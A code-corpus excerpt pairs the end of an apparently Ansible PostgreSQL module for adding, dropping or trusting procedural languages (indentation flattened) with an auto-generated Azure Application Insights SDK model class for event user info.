# If a login_unix_socket is specified, incorporate it here.
is_localhost = "host" not in kw or kw["host"] == "" or kw["host"] == "localhost"
if is_localhost and module.params["login_unix_socket"] != "":
kw["host"] = module.params["login_unix_socket"]
if psycopg2.__version__ < '2.4.3' and sslrootcert is not None:
        module.fail_json(msg='psycopg2 must be at least 2.4.3 in order to use the ssl_rootcert parameter')
try:
db_connection = psycopg2.connect(**kw)
cursor = db_connection.cursor()
except TypeError as e:
if 'sslrootcert' in e.args[0]:
module.fail_json(msg='Postgresql server must be at least version 8.4 to support sslrootcert')
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg="unable to connect to database: %s" % to_native(e), exception=traceback.format_exc())
changed = False
kw = {'db': db, 'lang': lang, 'trust': trust}
if state == "present":
if lang_exists(cursor, lang):
lang_trusted = lang_istrusted(cursor, lang)
if (lang_trusted and not trust) or (not lang_trusted and trust):
if module.check_mode:
changed = True
else:
changed = lang_altertrust(cursor, lang, trust)
else:
if module.check_mode:
changed = True
else:
changed = lang_add(cursor, lang, trust)
if force_trust:
changed = lang_altertrust(cursor, lang, trust)
else:
if lang_exists(cursor, lang):
if module.check_mode:
changed = True
kw['lang_dropped'] = True
else:
changed = lang_drop(cursor, lang, cascade)
if fail_on_drop and not changed:
msg = "unable to drop language, use cascade to delete dependencies or fail_on_drop=no to ignore"
module.fail_json(msg=msg)
kw['lang_dropped'] = changed
if changed:
if module.check_mode:
db_connection.rollback()
else:
db_connection.commit()
kw['changed'] = changed
module.exit_json(**kw)
if __name__ == '__main__':
main()
| gpl-3.0 |
Azure/azure-sdk-for-python | sdk/applicationinsights/azure-applicationinsights/azure/applicationinsights/models/events_user_info_py3.py | 1 | 1277 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EventsUserInfo(Model):
"""User info for an event result.
:param id: ID of the user
:type id: str
:param account_id: Account ID of the user
:type account_id: str
:param authenticated_id: Authenticated ID of the user
:type authenticated_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'account_id': {'key': 'accountId', 'type': 'str'},
'authenticated_id': {'key': 'authenticatedId', 'type': 'str'},
}
def __init__(self, *, id: str=None, account_id: str=None, authenticated_id: str=None, **kwargs) -> None:
super(EventsUserInfo, self).__init__(**kwargs)
self.id = id
self.account_id = account_id
self.authenticated_id = authenticated_id
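# Example usage (illustrative sketch; the identifier values below are placeholders):
#
#     user = EventsUserInfo(id='device-17', account_id='contoso',
#                           authenticated_id='[email protected]')
#     print(user.account_id)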
| mit |